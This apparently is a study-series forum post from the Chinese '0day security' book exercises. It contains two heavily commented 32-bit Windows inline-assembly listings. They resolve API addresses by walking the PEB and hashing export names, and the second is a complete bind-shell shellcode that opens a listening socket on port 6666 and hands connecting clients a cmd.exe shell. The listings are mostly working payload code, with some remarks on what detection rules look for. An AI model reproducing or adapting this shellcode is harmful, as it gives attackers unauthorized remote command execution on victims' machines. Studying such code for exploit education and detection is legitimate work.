旧书重温:0day2【1】 简单的缓冲区溢出案例 http://bbs.pediy.com/showthread.php?t=182497
旧书重温:0day2【2】 实验:三种获取kernel32.dll基址的方法 http://bbs.pediy.com/showthread.php?t=182498
旧书重温:0day2【3】 详细解读PEB法 查找kener32地址 http://bbs.pediy.com/showthread.php?t=182499
旧书重温:0day2【4】动态获取函数地址 http://bbs.pediy.com/showthread.php?t=182520
旧书重温:0day2【5】shellcode变形记 http://bbs.pediy.com/showthread.php?t=182551
旧书重温:0day2【6】bind_shell http://bbs.pediy.com/showthread.php?t=182689
/*
LoadLibraryA function`s hash is 0c917432
CreateProcessA function`s hash is 6ba6bcc9
ExitProcess function`s hash is 4fd18963
WSAStartup function`s hash is 80b46a3d
WSASocketA function`s hash is de78322d
bind function`s hash is dda71064
listen function`s hash is 4bd39f0c
accept function`s hash is 01971eb1
GetProcAddress function`s hash is bbafdf85
Press any key to continue
*/
//-----------------------------------------------------------------------
// bind_shell -- part 6 of the "0day security" ch.2 exercise series linked
// above. 32-bit Win32, MSVC inline asm (Intel syntax). This first draft
// only resolves the eight API addresses and then stops at a breakpoint;
// the socket / CreateProcessA stage exists only in the second listing.
//
// Structure (the behaviour pattern detection rules and reviewers look for):
//   1. Push the eight API-name hashes on the stack as a lookup table.
//   2. Find kernel32.dll by walking the PEB loader module list (fs:[0x30]).
//   3. Walk the module's export name table, hashing each name with
//      ror 7 / add until it matches; store the address in a parallel table.
//   4. When the first ws2_32 hash is reached, LoadLibraryA("ws2_32") and
//      keep resolving from that module.
// Register roles: esi = hash-list cursor, edi = address-table cursor,
// ebp = base of the module currently searched, edx = hash accumulator.
// PEB/LDR/PE offsets are the 32-bit XP-era layout the book assumes.
//-----------------------------------------------------------------------
void bind_shell()
{
// the building blocks come from the earlier posts in this series
__asm
{
CLD // DF = 0: lodsd/stosd advance upward
// push the hashes; the last one pushed (ExitProcess) ends up on top
push 0x80b46a3d //WSAStartup
push 0xde78322d //WSASocket
push 0xdda71064 //bind
push 0x4bd39f0c //listen
push 0x01971eb1 //accept
//---------------------- above: functions exported by ws2_32.dll
push 0x0c917432 //load
push 0x6ba6bcc9 //createProcessA
push 0x4fd18963 //ExitProcess
//----------------------- above: functions exported by kernel32.dll
mov esi,esp // esi = top of the hash list (ExitProcess hash); lodsd walks it upward
lea edi,[esi - 0x20] // 8 functions * 4 = 0x20: resolved addresses are stored BELOW the hashes, inside the area reserved next
xor ebx,ebx
mov bh,0x05 // ebx = 0x500
sub esp,ebx // move esp down 0x500 so later pushes and calls cannot clobber the hash and address tables
mov bx,0x3233 // ebx = "23\0\0" (upper half is already zero)
push ebx
push 0x5F327377 // "ws2_" -> the stack now holds "ws2_32\0\0"
push esp // pointer to "ws2_32": the argument for the LoadLibraryA call below
xor edx,edx // edx = 0; dx is also the terminator compared against in the module walk
mov ebx,fs:[edx+0x30] // ebx = PEB
mov ecx,[ebx + 0x0c] // ecx = PEB->Ldr
mov ecx,[ecx + 0x1c] // ecx = first entry of Ldr's initialization-order module list (offset 0x1c)
push edi // save both table cursors; the module walk reuses edi
push esi
next_module:
mov ebp,[ecx+0x08] // ebp = this entry's DllBase
mov edi,[ecx+0x20] // edi = this entry's BaseDllName buffer (UTF-16)
mov ecx,[ecx] // ecx = next entry (Flink)
cmp [edi + 12*2],dx // 13th UTF-16 unit == 0, i.e. a 12-character name: "kernel32.dll" on the systems this assumes
jne next_module
pop esi // restore the cursors; ebp = kernel32 base
pop edi
find_lib_functions:
lodsd // eax = next hash from the list; esi advances
cmp eax,0x01971eb1 // accept's hash is the first ws2_32 entry in this push order
jne find_functions // still a kernel32 hash: resolve directly; otherwise switch module first
xchg ebp,eax // keep the hash in ebp across the call (eax = kernel32 base, unused by the call)
call [edi - 0x04] // LoadLibraryA("ws2_32"): the 3rd address stored, which is [edi-4] at this point (the original comment said edi-0x0c, which does not match the code); stdcall pops the pointer pushed above
xchg ebp,eax // ebp = ws2_32 base, eax = the hash again
find_functions:
pushad // save all; [esp+0x1c] is now the saved eax = the hash being searched
mov eax,[ebp+0x3c] // e_lfanew
mov ecx,[ebp+eax+0x78] // export directory RVA
add ecx,ebp // ecx = IMAGE_EXPORT_DIRECTORY
mov ebx,[ecx+0x20] // AddressOfNames RVA
add ebx,ebp
xor edi,edi // edi = name index; the inc below means index 0 is never examined
next_function_loop:
inc edi // next export name
mov esi,[ebx+edi*4] // name RVA
add esi,ebp // esi = name string
cdq // edx = 0 (eax is small and non-negative here): hash accumulator
hash_loop: // hash = ror(hash, 7) + byte, over the whole name
movsx eax,byte ptr[esi]
cmp al,ah // ah is 0 after movsx of an ASCII byte, so this is "byte == 0"
jz compare_hash // NUL terminator reached: compare the hash
ror edx,7 // rotate right (not shift) by 7
add edx,eax //
inc esi
jmp hash_loop
compare_hash:
cmp edx,[esp+0x1c] // against the saved eax (the wanted hash)
jnz next_function_loop
mov ebx,[ecx+0x24] // AddressOfNameOrdinals RVA
add ebx,ebp
mov di,[ebx+2*edi] // ordinal; 16-bit write relies on edi's upper half being zero (true for this small index)
mov ebx,[ecx+0x1c] // AddressOfFunctions RVA
add ebx,ebp
add ebp,[ebx +4*edi] // ebp = function address
xchg eax,ebp // eax = address (ebp is restored by popad anyway)
pop edi // saved edi = address-table cursor
stosd // store the address, advance the cursor
push edi // put the advanced cursor back so popad restores it
popad
cmp eax,0x80b46a3d // WSAStartup was pushed first, so it is the last hash in the list
jne find_lib_functions
function_call: // all 8 addresses resolved; the socket stage is not written in this draft
int 13 // placeholder stop so a debugger can be attached (13 decimal = 0x0D, not the usual int 3)
}
}
//-----------------------------------------------------------------------
// Second listing: the finished bind-shell body (32-bit Win32, MSVC inline
// asm syntax). Same API-resolution scheme as the function above, then:
// WSAStartup -> WSASocketA -> bind/listen/accept on one socket ->
// CreateProcessA("cmd") with the client socket as stdin/stdout/stderr ->
// ExitProcess. The PEB walk with export-name hashing followed by this
// socket-to-CreateProcessA sequence is the behaviour a detection rule keys on.
//
// Differences from the first listing: the hashes are pushed in the opposite
// order (WSAStartup is now the first ws2_32 entry, accept the last), and the
// address table is placed ABOVE the hash list (lea edi,[esi + 0x20]). That
// region is not reserved by this code, so it overwrites whatever the caller
// had above the pushed hashes; the first listing stores the table below.
// Register roles: esi = hash/address cursor, edi = address-table cursor,
// ebp = module base during lookup, later the socket handle.
//-----------------------------------------------------------------------
CLD // DF = 0: lodsd/stosd advance upward
// push the hashes; the last one pushed (ExitProcess) ends up on top
push 0x01971eb1 //accept
push 0x4bd39f0c //listen
push 0xdda71064 //bind
push 0xde78322d //WSASocket
push 0x80b46a3d //WSAStartup
//---------------------- above: functions exported by ws2_32.dll
push 0x0c917432 //load
push 0x6ba6bcc9 //createProcessA
push 0x4fd18963 //ExitProcess
//----------------------- above: functions exported by kernel32.dll
mov esi,esp // esi = top of the hash list (ExitProcess hash); lodsd walks it upward
lea edi,[esi + 0x20] // 8 functions * 4 = 0x20: resolved addresses go just above the hash list (see header note)
xor ebx,ebx
mov bh,0x05 // ebx = 0x500
sub esp,ebx // move esp down 0x500 so later pushes and calls cannot clobber the hash list
mov bx,0x3233 // ebx = "23\0\0" (upper half is already zero)
push ebx
push 0x5F327377 // "ws2_" -> the stack now holds "ws2_32\0\0"
push esp // pointer to "ws2_32": the argument for the LoadLibraryA call below
xor edx,edx // edx = 0; dx is also the terminator compared against in the module walk
mov ebx,fs:[edx+0x30] // ebx = PEB
mov ecx,[ebx + 0x0c] // ecx = PEB->Ldr
mov ecx,[ecx + 0x1c] // ecx = first entry of Ldr's initialization-order module list (offset 0x1c)
push edi // save both table cursors; the module walk reuses edi
push esi
next_module:
mov ebp,[ecx+0x08] // ebp = this entry's DllBase
mov edi,[ecx+0x20] // edi = this entry's BaseDllName buffer (UTF-16)
mov ecx,[ecx] // ecx = next entry (Flink)
cmp [edi + 12*2],dx // 13th UTF-16 unit == 0, i.e. a 12-character name: "kernel32.dll" on the systems this assumes
jne next_module
pop esi // restore the cursors; ebp = kernel32 base
pop edi
find_lib_functions:
lodsd // eax = next hash from the list; esi advances
cmp eax,0x80b46a3d // WSAStartup's hash is the first ws2_32 entry in this push order
jne find_functions // still a kernel32 hash: resolve directly; otherwise switch module first
xchg ebp,eax // keep the hash in ebp across the call (eax = kernel32 base, unused by the call)
call [edi - 0x04] // LoadLibraryA("ws2_32"): the 3rd address stored, which is [edi-4] at this point (the original comment said edi-0x0c, which does not match the code); stdcall pops the pointer pushed above
xchg ebp,eax // ebp = ws2_32 base, eax = the hash again
find_functions:
pushad // save all; [esp+0x1c] is now the saved eax = the hash being searched
mov eax,[ebp+0x3c] // e_lfanew
mov ecx,[ebp+eax+0x78] // export directory RVA
add ecx,ebp // ecx = IMAGE_EXPORT_DIRECTORY
mov ebx,[ecx+0x20] // AddressOfNames RVA
add ebx,ebp
xor edi,edi // edi = name index; the inc below means index 0 is never examined
next_function_loop:
inc edi // next export name
mov esi,[ebx+edi*4] // name RVA
add esi,ebp // esi = name string
cdq // edx = 0 (eax is small and non-negative here): hash accumulator
hash_loop: // hash = ror(hash, 7) + byte, over the whole name
movsx eax,byte ptr[esi]
cmp al,ah // ah is 0 after movsx of an ASCII byte, so this is "byte == 0"
jz compare_hash // NUL terminator reached: compare the hash
ror edx,7 // rotate right (not shift) by 7
add edx,eax //
inc esi
jmp hash_loop
compare_hash:
cmp edx,[esp+0x1c] // against the saved eax (the wanted hash)
jnz next_function_loop
mov ebx,[ecx+0x24] // AddressOfNameOrdinals RVA
add ebx,ebp
mov di,[ebx+2*edi] // ordinal; 16-bit write relies on edi's upper half being zero (true for this small index)
mov ebx,[ecx+0x1c] // AddressOfFunctions RVA
add ebx,ebp
add ebp,[ebx +4*edi] // ebp = function address
xchg eax,ebp // eax = address (ebp is restored by popad anyway)
pop edi // saved edi = address-table cursor
stosd // store the address, advance the cursor
push edi // put the advanced cursor back so popad restores it
popad
cmp eax,0x01971eb1 // accept was pushed first, so it is the last hash in the list
jne find_lib_functions
function_call: // all 8 resolved; esi now points one past the hash list = start of the address table (ExitProcess entry)
add esi,0x0c // skip the ExitProcess/CreateProcessA/LoadLibraryA entries: esi -> WSAStartup's address
//mov eax,[esi]
//-------------------------------------------------- WSAStartup(wVersionRequested, lpWSAData)
//std
//std
push esp // lpWSAData: scratch space on the stack
push 0x02 // version 2.x
lodsd // eax = WSAStartup
call eax
// eax = 0 on success; reused below as a source of zeros
//------------------------------------------------- WSASocketA(af, type, protocol, lpProtocolInfo, g, dwFlags)
mov ecx,0x50
mov edi,esp
rep stosd // zero 0x50 dwords from esp upward: supplies the trailing zero arguments and later serves as sin_addr, STARTUPINFO and PROCESS_INFORMATION
inc eax //eax = 1
push eax // type = SOCK_STREAM (1)
inc eax
push eax // af = AF_INET (2); protocol, lpProtocolInfo, g, dwFlags are the zeroed dwords above
lodsd // eax = WSASocketA
call eax
xchg ebp,eax // ebp = socket handle
//-------------------------------------------------------- bind
mov eax,0x0a1aff02
xor ah,ah // eax = 0x0a1a0002: sin_family = AF_INET, sin_port = 0x1a0a in network order (6666); sin_addr is the zeroed stack = INADDR_ANY
push eax // sockaddr_in (first 4 bytes) on the stack
push esp // &sockaddr
call_loop: // bind, listen and accept share this loop: each call is f(socket, <whatever follows on the stack>)
push ebp // s
lodsd // eax = next function address
call eax
test eax,eax
jz call_loop // bind and listen return 0; accept returns a nonzero client handle and falls through (a failing accept returning INVALID_SOCKET also falls through)
// fill STARTUPINFO in the zeroed region at esp; eax = client socket
inc byte ptr [esp+0x2d] // dwFlags (+0x2c) |= 0x100 = STARTF_USESTDHANDLES
lea edi,[esp+0x38] // hStdInput
stosd // hStdInput = client socket
stosd // hStdOutput
stosd // hStdError
pop eax // eax = 0 (zeroed region)
// CreateProcessA arguments, pushed right to left; the first pushes land on the low fields of the STARTUPINFO just set up (cb etc.), which this code relies on CreateProcessA tolerating
push esp // lpProcessInformation
push esp // lpStartupInfo
push eax // lpCurrentDirectory = NULL
push eax // lpEnvironment = NULL
push eax // dwCreationFlags = 0
push esp // bInheritHandles = nonzero
push eax // lpThreadAttributes = NULL
push eax // lpProcessAttributes = NULL
//int 3
// lpCommandLine: write "cmd\0" (0x00646d63 little-endian) just past the address table
mov dword ptr [esi],0x646d63
push esi
// lpApplicationName = NULL
push eax
call [esi-0x1c] // CreateProcessA (table entry 2; esi = table + 0x20 here)
call [esi-0x20] // ExitProcess (table entry 1)